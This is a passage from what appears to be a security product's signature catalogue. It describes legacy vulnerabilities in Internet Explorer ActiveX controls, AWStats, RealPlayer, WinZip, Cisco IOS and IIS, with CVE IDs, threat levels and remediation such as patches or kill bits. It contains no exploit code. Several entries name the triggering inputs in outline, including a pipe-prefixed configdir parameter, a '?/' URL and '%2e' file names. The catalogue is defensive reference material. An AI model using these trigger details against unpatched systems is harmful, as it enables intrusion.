Signature Description: HTML Converter is an extension that allows applications to convert HTML data into Rich Text Format (RTF) while maintaining the formatting and structure of the data as well as the text. The converter also supports the conversion of RTF data into HTML. Microsoft Internet Explorer (versions 5 and 6) is vulnerable to a stack-based buffer overflow in the HTML conversion library (html32.cnv). By creating a new HTML document, opening it in a frame off screen, and writing a specially crafted 'align' attribute in an <HR> (Horizontal Rule) tag to the document, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the victim. The exploit is triggered when the victim views the malicious Web page or file, whether hosted on a Web site or sent to the victim as an HTML email.
Signature ID: 1507
Microsoft Internet Explorer Object Type Validation Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0532 Bugtraq: 8456
Signature Description: Microsoft Internet Explorer is the most widely used World Wide Web browser. It was developed by Microsoft. Microsoft Internet Explorer (IE) will execute an HTML Application referenced by the DATA attribute of an OBJECT element. The OBJECT element is used as a way to embed ActiveX controls, and its DATA attribute is a URI that provides the data for the object. Microsoft Internet Explorer versions 5.01, 5.5, and 6 do not properly determine object data tags. A remote attacker could create a specially crafted URL link using the Object Data tags, which would be executed in the victim's Web browser within the security context of the hosting site once the link is clicked. An attacker could exploit this vulnerability by sending it to a victim as an HTML email.
Signature ID: 1510
Lupper worm - AWStats configdir Parameter Input Validation Flaw
Threat Level: Severe
Industry ID: CVE-2005-0116 Bugtraq: 12298
Signature Description: Lupper is a worm that infects Linux systems and spreads through Web servers by exploiting the AWStats Rawlog Plugin input vulnerability. This worm does not infect Windows systems. It sends random HTTP requests on port 80. If any Web server is vulnerable, the worm exploits the vulnerability and downloads a copy of itself onto the Web server. It also sends a pre-configured list of commands to the AWStats scripts. AWStats is a Perl CGI script that collects and graphically displays statistics from web, FTP, and mail servers. AWStats versions prior to 6.3 are vulnerable to an input validation flaw that allows remote attackers to execute arbitrary commands with the privileges of the Web server. The problem exists in the 'awstats.pl' Perl script, which takes the parameter 'configdir' as user-supplied input. Because the configdir parameter is not validated, a remote attacker can supply arbitrary commands in this parameter prefixed with the '|' character, which leads to execution of those commands.
Signature ID: 1511
RealNetworks RealOne Player/RealPlayer SMIL File Remote Stack Based Buffer Overflow
Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0455 Bugtraq: 12697
Signature Description: RealPlayer is an application for playing various media formats, developed by RealNetworks Inc. RealPlayer is vulnerable to a stack-based buffer overflow due to a lack of boundary checks performed by the application when parsing Synchronized Multimedia Integration Language (SMIL) files. An attacker can exploit this vulnerability using a specially crafted .smil file that sets the system-screen-size parameter to a string of more than 256 bytes. Successful exploitation allows arbitrary code execution. RealPlayer 8 or above on Windows and RealPlayer 10 on Linux/Mac are vulnerable.
Signature ID: 1512
Internet explorer WebViewFolderIcon setSlice code Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-3730 Bugtraq: 19030
Signature Description: Microsoft Internet Explorer is the most widely used World Wide Web browser. It is developed by Microsoft. Microsoft Internet Explorer version 6 on Windows XP SP2 contains an integer underflow vulnerability. The Microsoft WebViewFolderIcon object is an ActiveX control provided by the file webvw.dll. By passing a malformed WebViewFolderIcon ActiveX object (webvw.dll) with an invalid argument (0x7ffffff) to the "setSlice()" method, a remote attacker could exploit this vulnerability to execute arbitrary code on the victim's system or cause the victim's browser to crash. Apply the updates listed in Microsoft Security Bulletin MS06-057.
Signature ID: 1513
Internet explorer WebViewFolderIcon ActiveX Code Execution Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2006-3730 Bugtraq: 19030
Signature Description: Microsoft Internet Explorer is the most widely used World Wide Web browser. It is developed by Microsoft. Microsoft Internet Explorer version 6 on Windows XP SP2 contains an integer underflow vulnerability. The Microsoft WebViewFolderIcon object is an ActiveX control provided by the file webvw.dll. By passing a malformed WebViewFolderIcon ActiveX object (webvw.dll) with an invalid argument to the "setSlice()" method, a remote attacker could exploit this vulnerability to execute arbitrary code on the victim's system or cause the victim's browser to crash. Apply the updates listed in Microsoft Security Bulletin MS06-057 or set the kill bit for CLSID 844F4806-E8A8-11d2-9652-00C04FC30871.
Signature ID: 1514
Internet explorer WebViewFolderIcon ActiveX Code Execution Vulnerability(2)
Threat Level: Warning
Industry ID: CVE-2006-3730 Bugtraq: 19030
Signature Description: Microsoft Internet Explorer is the most widely used World Wide Web browser. It is developed by Microsoft. Microsoft Internet Explorer version 6 on Windows XP SP2 contains an integer underflow vulnerability. The Microsoft WebViewFolderIcon object is an ActiveX control provided by the file webvw.dll. By passing a malformed WebViewFolderIcon ActiveX object (webvw.dll) with an invalid argument to the "setSlice()" method, a remote attacker could exploit this vulnerability to execute arbitrary code on the victim's system or cause the victim's browser to crash. Apply the updates listed in Microsoft Security Bulletin MS06-057 or set the kill bit for CLSID E5DF9D10-3B52-11D1-83E8-00A0C90DC849.
Signature ID: 1521
Cisco IOS Software HTTP Request Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0984 Bugtraq: 1838
Signature Description: Cisco IOS is the operating system used on the vast majority of Cisco Systems routers and all current Cisco network switches. The HTTP server in Cisco IOS 12.0 through 12.1 allows local users to cause a denial of service (crash and reload) via a URL containing a "?/" string. The device enters an infinite loop when supplied with a URL containing "?/" together with an enable password. The router then crashes two minutes later, after the watchdog timer has expired, and reloads. In certain cases the device does not reload and a restart is required.
Signature ID: 1525
Microsoft XML Core Service XMLHTTP ActiveX Control Remote Code Execution
Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-5745 Bugtraq: 20915
Signature Description: Microsoft XML Core Services (MSXML) allows developers who use applications such as JScript, Visual Basic Scripting Edition (VBScript), and Microsoft Visual Studio to create XML-based applications. MSXML includes the XMLHTTP ActiveX control, which allows Web pages to transmit or receive XML data via HTTP operations. The XMLHTTP 4.0 ActiveX control contains an unspecified memory corruption vulnerability. By persuading the victim to visit a Web page containing %u-encoded malicious data, an attacker can execute arbitrary code on the victim's machine. Apply the available patch provided by the vendor; alternatively, users can set the kill bit for the CLSIDs 88d969c5-f192-11d4-a65f-0040963251e5 and 88d96a0a-f192-11d4-a65f-0040963251e5.
Signature ID: 1526
Microsoft XML Core Service XMLHTTP ActiveX Control Remote Code Execution
Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-5745 Bugtraq: 20915
Signature Description: Microsoft XML Core Services (MSXML) allows developers who use applications such as JScript, Visual Basic Scripting Edition (VBScript), and Microsoft Visual Studio to create XML-based applications. MSXML includes the XMLHTTP ActiveX control, which allows Web pages to transmit or receive XML data via HTTP operations. The XMLHTTP 4.0 ActiveX control contains an unspecified memory corruption vulnerability. A remote attacker could exploit this vulnerability to execute arbitrary code on a victim's system if the attacker could persuade the victim to visit a Web page containing hex-encoded malicious data. Apply the available patch provided by the vendor; alternatively, users can set the kill bit for the CLSIDs 88d969c5-f192-11d4-a65f-0040963251e5 and 88d96a0a-f192-11d4-a65f-0040963251e5.
Signature ID: 1527
Microsoft XML Core Service XMLHTTP ActiveX Control Remote Code Execution
Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-5745 Bugtraq: 20915
Signature Description: Microsoft XML Core Services (MSXML) allows developers who use applications such as JScript, Visual Basic Scripting Edition (VBScript), and Microsoft Visual Studio to create XML-based applications. MSXML includes the XMLHTTP ActiveX control, which allows Web pages to transmit or receive XML data via HTTP operations. The XMLHTTP 4.0 ActiveX control contains an unspecified memory corruption vulnerability. A remote attacker could exploit this vulnerability to execute arbitrary code on a victim's system if the attacker could persuade the victim to visit a Web page containing a malicious XMLHTTP ActiveX control. Microsoft has released updates in Microsoft Security Bulletin MS06-071 to address this issue. This signature detects the ProgID.
Signature ID: 1528
WinZip FileView ActiveX Control Unsafe filepattern() Method Exposure Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2006-5198 Bugtraq: 21060
Signature Description: WinZip is a proprietary file archiver and compressor for Microsoft Windows, developed by WinZip Computing (Nico Mak Computing). WinZip's FileView ActiveX control version 10.0 prior to Build 7245 is vulnerable to a stack-based buffer overflow. By persuading a victim to visit a specially crafted Web page that passes an overly long string to the filepattern() method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user or cause the victim's browser to crash. As a workaround, set the kill bit for the affected ActiveX control, CLSID A09AE68F-B14D-43ED-B713-BA413F034904.
Signature ID: 1529
WinZip FileView ActiveX Control Unsafe filepattern() Method Exposure Vulnerability(2)
Threat Level: Severe
Industry ID: CVE-2006-5198 Bugtraq: 21060
Signature Description: WinZip is a proprietary file archiver and compressor for Microsoft Windows, developed by WinZip Computing (Nico Mak Computing). WinZip's FileView ActiveX control version 10.0 prior to Build 7245 is vulnerable to a stack-based buffer overflow. By persuading a victim to visit a specially crafted Web page that passes the ProgID WZFILEVIEW.FileViewCtrl.61 via the insecure filepattern() method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user or cause the victim's browser to crash.
Signature ID: 1530
WinZip FileView ActiveX Control Unsafe filepattern() Method Exposure Vulnerability(3)
Threat Level: Warning
Industry ID: CVE-2006-5198 Bugtraq: 21060
Signature Description: WinZip is a proprietary file archiver and compressor for Microsoft Windows, developed by WinZip Computing (Nico Mak Computing). WinZip's FileView ActiveX control version 10.0 prior to Build 7245 is vulnerable to a stack-based buffer overflow. By persuading a victim to visit a specially crafted Web page that passes the CLSID, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user or cause the victim's browser to crash. As a workaround, set the kill bit for the affected ActiveX control, CLSID A09AE68F-B14D-43ED-B713-BA413F034904.
Signature ID: 1531
Acer LunchApp.APlunch ActiveX Control Run Insecure Method Exposure Vulnerability(1)
Threat Level: Severe
Industry ID: CVE-2006-6121 Bugtraq: 21207
Signature Description: The Acer LunchApp ActiveX control is provided by LunchApp.ocx. Acer laptops could allow a remote attacker to execute arbitrary commands on the system because of the insecure "Run()" method exposed by the LunchApp.APlunch ActiveX control. A remote attacker could exploit this vulnerability by creating a malicious Web page and persuading a victim to visit the page. The affected models are the Acer Aspire 5600 and Acer TravelMate 4150. No remedy is available. Users can set the kill bit for the control's CLSID.
Signature ID: 1532
Acer LunchApp.APlunch ActiveX Control Run Insecure Method Exposure Vulnerability(2)
Threat Level: Severe
Industry ID: CVE-2006-6121 Bugtraq: 21207
Signature Description: The Acer LunchApp ActiveX control is provided by LunchApp.ocx. Acer laptops could allow a remote attacker to execute arbitrary commands on the system because of the insecure "Run()" method exposed by the LunchApp.APlunch ActiveX control. A remote attacker could exploit this vulnerability by creating a malicious Web page and persuading a victim to visit the page. The affected models are the Acer Aspire 5600 and Acer TravelMate 4150. No remedy is available. This rule detects the ProgID (LunchApp.APlunch).
Signature ID: 1533
Acer LunchApp.APlunch ActiveX Control Run Insecure Method Exposure Vulnerability(3)
Threat Level: Warning
Industry ID: CVE-2006-6121 Bugtraq: 21207
Signature Description: The Acer LunchApp ActiveX control is provided by LunchApp.ocx. Acer laptops could allow a remote attacker to execute arbitrary commands on the system because of the insecure "Run()" method exposed by the LunchApp.APlunch ActiveX control. A remote attacker could exploit this vulnerability by creating a malicious Web page and persuading a victim to visit the page. The affected models are the Acer Aspire 5600 and Acer TravelMate 4150. No remedy is available. Users can set the kill bit for the control's CLSID. This signature detects only the CLSID.
Signature ID: 1534
Altnet Download Manager Buffer Overflow Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2004-2433 Bugtraq: 11101
Signature Description: This vulnerability is caused by a boundary error within the IsValidFile() method in the ADM ActiveX control. It can be exploited to cause a stack-based buffer overflow via a malicious Web site by passing an overly long string to the bstrFilepath parameter. The application is included in the file-sharing applications Kazaa and Grokster. Altnet Download Manager 4.0.0.2 and prior and Altnet Download Manager 4.0.0.4 are vulnerable. No remedy was available as of July 6, 2008.
Signature ID: 1535
Altnet Download Manager Buffer Overflow Vulnerability(2)
Threat Level: Severe
Industry ID: CVE-2004-2433 Bugtraq: 11101
Signature Description: This vulnerability is caused by a boundary error within the IsValidFile() method in the ADM ActiveX control. It can be exploited to cause a stack-based buffer overflow via a malicious Web site by passing an overly long string to the bstrFilepath parameter. The application is included in the file-sharing applications Kazaa and Grokster. Altnet Download Manager 4.0.0.2 and prior and Altnet Download Manager 4.0.0.4 are vulnerable. This rule detects the ProgID and method. No remedy was available as of July 6, 2008.
Signature ID: 1536
Altnet Download Manager Buffer Overflow Vulnerability(3)
Threat Level: Warning
Industry ID: CVE-2004-2433 Bugtraq: 11101
Signature Description: This vulnerability is caused by a boundary error within the IsValidFile() method in the ADM ActiveX control. It can be exploited to cause a stack-based buffer overflow via a malicious Web site by passing an overly long string to the bstrFilepath parameter. The application is included in the file-sharing applications Kazaa and Grokster. Altnet Download Manager 4.0.0.2 and prior and Altnet Download Manager 4.0.0.4 are vulnerable. This rule detects the CLSID. No remedy was available as of July 6, 2008.
Signature ID: 1537
Microsoft Internet Explorer ADODB.Connection Execute() Memory Corruption
Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2006-5559 Bugtraq: 20704
Signature Description: Microsoft ActiveX Data Objects (ADO) are objects that expose data raised by an underlying OLE DB provider. The ADODB.Connection ActiveX control (ADODB.Connection.2.7 and ADODB.Connection.2.8) is vulnerable to memory corruption via the Execute() method. A remote attacker could exploit this vulnerability by creating a specially crafted Web page and persuading a victim to visit the page. Users should apply the available patches. Alternatively, users can set the kill bit for the ADODB.Connection ActiveX control, CLSID 00000535-0000-0010-8000-00AA006D2EA4.
Signature ID: 1538
Microsoft Internet Explorer ADODB.Connection Execute() Memory Corruption
Vulnerability(2)
Threat Level: Severe
Industry ID: CVE-2006-5559 Bugtraq: 20704
Signature Description: Microsoft ActiveX Data Objects (ADO) are objects that expose data raised by an underlying OLE DB provider. The ADODB.Connection ActiveX control (ADODB.Connection.2.7 and ADODB.Connection.2.8) is vulnerable to memory corruption via the Execute() method. A remote attacker could exploit this vulnerability by creating a specially crafted Web page and persuading a victim to visit the page. Users should apply the available patches. This signature detects the ProgID (ADODB.Connection).
Signature ID: 1539
Microsoft Internet Explorer ADODB.Connection Execute() Memory Corruption
Vulnerability(3)
Threat Level: Warning
Industry ID: CVE-2006-5559 Bugtraq: 20704
Signature Description: Microsoft ActiveX Data Objects (ADO) are objects that expose data raised by an underlying OLE DB provider. The ADODB.Connection ActiveX control (ADODB.Connection.2.7 and ADODB.Connection.2.8) is vulnerable to memory corruption via the Execute() method. A remote attacker could exploit this vulnerability by creating a specially crafted Web page and persuading a victim to visit the page. Users should apply the available patches. Alternatively, users can set the kill bit for the ADODB.Connection ActiveX control, CLSID 00000535-0000-0010-8000-00AA006D2EA4.
Signature ID: 1540
QuickTime Media Link (.qtl) Arbitrary Script Inclusion Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-4965 CVE-2007-5045 Bugtraq: 20138
Signature Description: The vulnerability is caused by a useful feature called QuickTime Media Link (.qtl).
QuickTime Media Link files are used to play media files in a more accessible way. A malicious user can create a .qtl
file containing JavaScript code that can take over important network devices when executed. QuickTime
does not care whether Media Link (.qtl) files end with a .mp3, .mp4, .m4a or even .mov extension. Vulnerable platforms are
openSUSE 10.2, openSUSE 10.3, SUSE Linux 10, SUSE Linux 10.1, SUSE Linux Enterprise Server 10, SuSE Linux
Enterprise Server 8, SUSE Linux Enterprise Server 9, SuSE Linux Openexchange Server 4.x, UnitedLinux 1.0 and
Mozilla Firefox.
Signature ID: 1541
RealPlayer IERPPLUG.DLL ActiveX Control Remote Denial of Service Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2006-6847 Bugtraq: 21802
Signature Description: RealPlayer is a media player. The RealPlayer ActiveX control allows users to stream various media
files through their web browser. The RealPlayer ActiveX control (RealPlayer 10.5) is vulnerable to a buffer overflow caused
by improper bounds checking in the OpenURLInPlayerBrowser() method. A remote attacker could overflow a buffer and
execute arbitrary code on the system with the privileges of the victim or cause the victim's browser to crash. Users can
set the kill bit for CLSID FDC7A535-4070-4B92-A0EA-D9994BCC0DC5 to disable this ActiveX control. No update is
available as of 2008.
Signature ID: 1542
RealPlayer IERPPLUG.DLL ActiveX Control Remote Denial of Service Vulnerability(2)
Threat Level: Warning
Industry ID: CVE-2006-6847 Bugtraq: 21802
Signature Description: RealPlayer is a media player. The RealPlayer ActiveX control allows users to stream various media
files through their web browser. The RealPlayer ActiveX control (RealPlayer 10.5) is vulnerable to a buffer overflow caused
by improper bounds checking in the OpenURLInPlayerBrowser() method. A remote attacker could overflow a buffer and
execute arbitrary code on the system with the privileges of the victim or cause the victim's browser to crash. No update
is available as of 2008. This signature detects the ProgID (IERPCtl.IERPCtl).
Signature ID: 1543
Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX Arbitrary Code
Execution Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2006-2383 Bugtraq: 18303
Signature Description: Microsoft DirectX is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(versions 5.01 SP4, 6, and 6 SP1) has a memory corruption vulnerability in the
DXImageTransform.Microsoft.Light ActiveX control. By persuading a victim to visit a malicious web page that passes
specially-crafted data to the affected control, a remote attacker could execute arbitrary commands on the victim's system
with the privileges of the victim.
Signature ID: 1544
Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX Arbitrary Code
Execution Vulnerability(2)
Threat Level: Warning
Industry ID: CVE-2006-2383 Bugtraq: 18303
Signature Description: Microsoft DirectX is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(versions 5.01 SP4, 6, and 6 SP1) has a memory corruption vulnerability in the
DXImageTransform.Microsoft.Light ActiveX control. By persuading a victim to visit a malicious web page that passes
specially-crafted data to the affected control, a remote attacker could execute arbitrary commands on the victim's system
with the privileges of the victim. This signature detects the ProgID (DXImageTransform.Microsoft.Light).
Signature ID: 1545
Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect1Input ActiveX
Arbitrary Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-1303 Bugtraq: 18328
Signature Description: Microsoft DirectX is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(versions 5.01 SP4, 6, and 6 SP1) has a memory corruption vulnerability in the handling
of COM objects. By persuading a victim to visit a malicious web page containing an invalid
DXImageTransform.Microsoft.MMSpecialEffect1Input ActiveX object, a remote attacker could execute arbitrary code and gain
complete control over the victim's system.
Signature ID: 1546
Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect2Inputs ActiveX
Arbitrary Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-1303 Bugtraq: 18328
Signature Description: Microsoft DirectX is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(versions 5.01 SP4, 6, and 6 SP1) has a memory corruption vulnerability in the handling
of COM objects. By persuading a victim to visit a malicious web page containing an invalid
DXImageTransform.Microsoft.MMSpecialEffect2Inputs ActiveX object, a remote attacker could execute arbitrary code and gain
complete control over the victim's system.
Signature ID: 1547
Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffectInplace1Input
ActiveX Arbitrary Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-1303 Bugtraq: 18328
Signature Description: Microsoft DirectX is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(versions 5.01 SP4, 6, and 6 SP1) has a memory corruption vulnerability in the handling
of COM objects. By persuading a victim to visit a malicious web page containing an invalid
DXImageTransform.Microsoft.MMSpecialEffectInplace1Input ActiveX object, a remote attacker could execute arbitrary code
and gain complete control over the victim's system.
Signature ID: 1548
Microsoft Internet Explorer Mdt2dd.dll Insecure COM Instantiation Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-1186 Bugtraq: 17453
Signature Description: Microsoft DirectX is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(versions 5.01 SP4, 6, and 6 SP1) has a memory corruption vulnerability in the handling
of COM objects in Mdt2dd.dll, Mdt2gddr.dll and Mdt2gddo.dll. By persuading a victim to visit a specially-crafted web
page containing invalid COM objects, a remote attacker could execute arbitrary code and gain complete control over
the victim's system.
Signature ID: 1549
Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-3655 Bugtraq: 16226
Signature Description: Novell SUSE Linux Enterprise Server is a platform for open source computing in an enterprise
environment. Open-Enterprise-Server 9.0 is vulnerable to a heap-based buffer overflow triggered by an HTTP request
with a negative Content-Length header. Successful exploitation of this vulnerability allows an attacker to execute
arbitrary commands on the vulnerable system. This vulnerability is fixed and patches are available from the vendor's web
site.
Signature ID: 1550
Novell GroupWise Messenger Accept-Language Remote Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-0992 Bugtraq: 17503
Signature Description: Novell Messenger is a corporate, cross-platform instant messaging product that is based on
Novell eDirectory. Novell GroupWise Messenger 2.0 and prior are vulnerable to a stack-based buffer overflow via a
long Accept-Language value without a comma or semicolon. Successful exploitation of this vulnerability allows an
attacker to execute arbitrary commands on the vulnerable system. This vulnerability is fixed in GroupWise Messenger
2.0 Public Beta 2. Users are advised to update to GroupWise Messenger 2.0 Public Beta 2 or a later version to
resolve this issue.
Signature ID: 1551
Microsoft Internet Explorer DirectAnimation.DATuple ActiveX Arbitrary Code Execution
Vulnerability(1)
Threat Level: Severe
Industry ID: CVE-2006-3638 Bugtraq: 19340
Signature Description: Microsoft Internet Explorer (IE) allows instantiation of COM objects not designed for use in the
browser. Microsoft IE does not properly handle uninitialized COM objects. Microsoft COM is a technology that allows
programmers to create reusable software components that can be incorporated into applications to extend their
functionality. Microsoft Internet Explorer (versions 5.01 and 6) has a denial of service
vulnerability. This vulnerability is caused by memory corruption in the DirectAnimation.DATuple ActiveX control
Nth() method. Successful exploits may allow attackers to crash the application, denying further service to users. This
issue may also be exploited to execute arbitrary machine code. Users are advised to set the kill bit for the vulnerable
ActiveX control's CLSID 5DFB2651-9668-11D0-B17B-00C04FC2A0CA.
Signature ID: 1552
Microsoft Internet Explorer DirectAnimation.DATuple ActiveX Arbitrary Code Execution
Vulnerability(2)
Threat Level: Severe
Industry ID: CVE-2006-3638 Bugtraq: 19340
Signature Description: Microsoft Internet Explorer (IE) allows instantiation of COM objects not designed for use in the
browser. Microsoft IE does not properly handle uninitialized COM objects. Microsoft COM is a technology that allows
programmers to create reusable software components that can be incorporated into applications to extend their
functionality. Microsoft Internet Explorer (versions 5.01 and 6) has a denial of service
vulnerability. This vulnerability is caused by memory corruption in the DirectAnimation.DATuple ActiveX control
Nth() method. Successful exploits may allow attackers to crash the application, denying further service to users. This
issue may also be exploited to execute arbitrary machine code.
Signature ID: 1554
Microsoft Internet Explorer VML fill method Buffer overflow Vulnerability(1)
Threat Level: Severe
Industry ID: CVE-2006-4868 CVE-2006-3866 Bugtraq: 20096
Signature Description: Microsoft Internet Explorer is a series of graphical web browsers developed by Microsoft.
Microsoft Internet Explorer (versions 5.01 SP4 and 6 SP1) has a stack-based buffer overflow
vulnerability in "VGX.dll" in the processing of Vector Markup Language (VML) text. VML (Vector Markup Language)
is an XML (Extensible Markup Language) language used to produce vector graphics. By creating a malicious HTML
document containing a specially-crafted VML document with an overly long "fill" method inside a "rect" tag, and
persuading a victim to open it in the Internet Explorer browser, a remote attacker could overflow a buffer and execute
arbitrary code on the system with the permissions of the victim user. An attacker could exploit this vulnerability by
hosting the file on a web site or sending it to a victim as an email attachment.
Signature ID: 1555
Microsoft Internet Explorer VML Buffer overflow Vulnerability(2)
Threat Level: Warning
Industry ID: CVE-2006-4868 CVE-2006-3866 Bugtraq: 20096
Signature Description: Microsoft Internet Explorer is a series of graphical web browsers developed by Microsoft.
Microsoft Internet Explorer (versions 5.01 SP4 and 6 SP1) has a stack-based buffer overflow
vulnerability in "VGX.dll" in the processing of Vector Markup Language (VML) text. VML (Vector Markup Language)
is an XML (Extensible Markup Language) language used to produce vector graphics. By creating a malicious HTML
document containing a specially-crafted VML document with an overly long "fill" method inside a "rect" tag, and
persuading a victim to open it in the Internet Explorer browser, a remote attacker could overflow a buffer and execute
arbitrary code on the system with the permissions of the victim user. An attacker could exploit this vulnerability by
hosting the file on a web site or sending it to a victim as an email attachment. Users can set the kill bit for the CLSID
corresponding to the ProgID PeerDraw.PeerDraw.1 to resolve this issue.
Signature ID: 1556
Microsoft Internet Explorer VML Buffer overflow Vulnerability(3)
Threat Level: Warning
Industry ID: CVE-2006-4868 CVE-2006-3866 Bugtraq: 20096
Signature Description: Microsoft Internet Explorer is a series of graphical web browsers developed by Microsoft.
Microsoft Internet Explorer (versions 5.01 SP4 and 6 SP1) has a stack-based buffer overflow
vulnerability in "VGX.dll" in the processing of Vector Markup Language (VML) text. VML (Vector Markup Language)
is an XML (Extensible Markup Language) language used to produce vector graphics. By creating a malicious HTML
document containing a specially-crafted VML document with an overly long "fill" method inside a "rect" tag, and
persuading a victim to open it in the Internet Explorer browser, a remote attacker could overflow a buffer and execute
arbitrary code on the system with the permissions of the victim user. An attacker could exploit this vulnerability by
hosting the file on a web site or sending it to a victim as an email attachment. Users can set the kill bit for the CLSID
10072CEC-8CC1-11D1-986E-00A0C955B42E to resolve this issue.
Signature ID: 1561
Microsoft HTML Help ActiveX control Input Validation Vulnerability(1)
Threat Level: Warning
Industry ID: CVE-2007-0214 Bugtraq: 22478
Signature Description: Hypertext Markup Language (HTML) is the language used to create documents for
display on the World Wide Web. The markup tells the Web browser how to display a Web page's words and images for
the user. The HTML Help control (HHCtrl Object) is a Windows ActiveX control that provides the ability to view
HTML help files. The HHCtrl Object is included in the file hhctrl.ocx and provides the ProgID (Internet.HHCtrl). By
passing malformed arguments to certain methods, a remote attacker could exploit this vulnerability and execute arbitrary
code by tricking a user into visiting a specially-crafted web page. Affected versions are Microsoft Windows 2000 SP3,
XP SP2 and Professional, and Microsoft Windows 2003 SP1.
Signature ID: 1562
Microsoft HTML Help ActiveX control Input Validation Vulnerability(2)
Threat Level: Warning
Industry ID: CVE-2007-0214 Bugtraq: 22478
Signature Description: Hypertext Markup Language (HTML) is the language used to create documents for
display on the World Wide Web. The markup tells the Web browser how to display a Web page's words and images for
the user. The HTML Help control (HHCtrl Object) is a Windows ActiveX control that provides the ability to view
HTML help files. By passing malformed arguments to certain methods, a remote attacker could exploit this
vulnerability and execute arbitrary code. Affected versions are Microsoft Windows 2000 SP3, XP SP2 and
Professional, and Microsoft Windows 2003 SP1. Users can set the kill bit for the CLSID 52a2aaae-085d-4187-97ea-8c30db990436
to resolve this issue.
Signature ID: 1696
Microsoft IIS Failure To Log Undocumented TRACK Requests Vulnerability
Threat Level: Warning
Bugtraq: 9313
Signature Description: Microsoft Internet Information Services (IIS) is a set of Internet-based services for servers using
Microsoft Windows. Microsoft Internet Information Server (IIS 4.0 and 5.0) fails to properly log HTTP
TRACK requests. The HTTP TRACK method asks a web server to echo the contents of the request back to the client for
debugging purposes. By sending a specially-crafted HTTP TRACK request, a remote attacker may abuse HTTP TRACK
functionality to gain access to information in HTTP headers such as cookies and authentication data. Upgrade to the latest
version from the vendor's website.
Signature ID: 1698
Microsoft IIS ISAPI Printer Extension Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0241 Bugtraq: 2674 Nessus: 10661,10657
Signature Description: Microsoft Internet Information Services (IIS) is a set of Internet-based services for servers using
Microsoft Windows. Microsoft Internet Information Server (IIS version 5.0) has a buffer overflow
vulnerability in the handling of ISAPI (Internet Services Application Programming Interface) extensions. ISAPI
(Internet Server Application Program Interface) is a set of Windows program calls that enables programmers to
develop Web-based applications that run much faster than Common Gateway Interface (CGI) applications. An
unchecked buffer exists in the Internet Printing Protocol (IPP) ISAPI extension in Windows 2000 that handles user
requests (msw3prt.dll). IPP (Internet Printing Protocol) is an Internet protocol that allows universal solutions for users
trying to print documents from the Internet. This signature detects an attempt to exploit the Host header field with
more than 300 bytes of data in HTTP traffic. This issue is fixed and patches are available from the vendor's website.
Signature ID: 1699
Microsoft IIS ISAPI Printer Extension Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2001-0241 Bugtraq: 2674 Nessus: 10661,10657
Signature Description: Microsoft Internet Information Services (IIS) is a set of Internet-based services for servers using
Microsoft Windows. Microsoft Internet Information Server (IIS version 5.0) has a buffer overflow
vulnerability in the handling of ISAPI (Internet Services Application Programming Interface) extensions. ISAPI
(Internet Server Application Program Interface) is a set of Windows program calls that enables programmers to
develop Web-based applications that run much faster than Common Gateway Interface (CGI) applications. An
unchecked buffer exists in the Internet Printing Protocol (IPP) ISAPI extension in Windows 2000 that handles user
requests (msw3prt.dll). IPP (Internet Printing Protocol) is an Internet protocol that allows universal solutions for users
trying to print documents from the Internet. This signature detects a printer request containing more than 300 bytes
with null URI data. This issue is fixed and patches are available from the vendor's web site.
Signature ID: 1700
Microsoft IIS 3.0 '%2e' ASP Source Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0253 Bugtraq: 1814
Signature Description: Microsoft Internet Information Services (IIS) is a set of Internet-based services for servers using
Microsoft Windows. Microsoft IIS (versions 1.0, 2.0 and 3.0) will return the source code of various server-side
script files, such as ASP files, if the filename in the URL request contains "%2e" (the hex-encoded value of "."). An
Active Server Page (ASP) is an HTML page that includes one or more scripts (small embedded programs) that are
processed on a Microsoft Web server before the page is sent to the user. A remote attacker could thereby obtain sensitive
information such as user names and passwords. Upgrade to the latest version from the vendor's website.
Signature ID: 1701
Microsoft IIS 4.0 Buffer Overflow While Processing .HTR, .STM and .IDC Files Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0874 Bugtraq: 307
